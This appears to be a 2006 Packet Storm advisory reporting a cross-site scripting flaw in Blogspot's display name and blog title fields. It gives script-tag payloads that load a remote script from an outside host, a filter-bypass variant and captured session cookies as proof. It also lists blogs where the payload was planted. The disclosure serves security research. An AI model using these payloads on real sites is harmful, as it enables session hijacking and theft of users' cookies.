what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

blogspot.txt

blogspot.txt
Posted Jun 21, 2006
Authored by Luny

Blogspot.com appears vulnerable to cross site scripting attacks.

tags | exploit, xss
SHA-256 | 9705874a96dced5f0ff34cb2be963da761a1e92b77e2b97977203e4e5083c50b

blogspot.txt

Change Mirror Download
Blogspot.com

Homepage:
http://www.blogspot.com

Affected files:

Blog input boxes
------------------------------------------

XSS vuln via Display name input box.

Blogger doesnt properally sanatize user input before generating it. For example, you can't use illegal characters in your username,or password, but for a "Display name", theyre allowed. Also, in Blog title, you can use them.

For a PoC in the display name box try putting:
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

When you visit your blog at http://whatever.blogspot.com, you'll see the code printedon the page, however it works. If you were to use a img tag as your display name, the image would be displayed.


And to bypass the not allowed html filter, we put the numerical equivlent of < before the actual tag, as well as > after the tag

<<SCRIPT SRC=http://ha.ckers.org/xss.js>>

With that code above you'll notice your cookie data has popped up. Awesome huh? Below the screenshot & cookie data:


Our cookie:

This is remote text via xss.js located at ha.ckers.org NSC_cmphhfs-fyu=0a1401230050; JSESSIONID=41EF1903DD571793A2D29B41CCED8834; ServerID=1315; hlSession=en; hl=en; __utma=150635877.44768819.1150269380.1150269380.
1150269380.1; __utmb=150635877; __utmc=150635877; __utmz=150635877.1150269380.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); NSC_cmphhfs-fyu=0a1401030050;I=SWgFh0wsBAAA=.hCANmCIpgh6067BRKRqqmg==.a+/bxnhvdaZFY6bOWAk5wQ==; B1I=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E&


Screenshots:
http://www.youfucktard.com/xsp/blogspot1.jpg
http://www.youfucktard.com/xsp/blogspot2.jpg


Example blogs with the vuln inplanted:
http://ghgfde3.blogspot.com/
(NSFW) http://botguy.blogspot.com
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close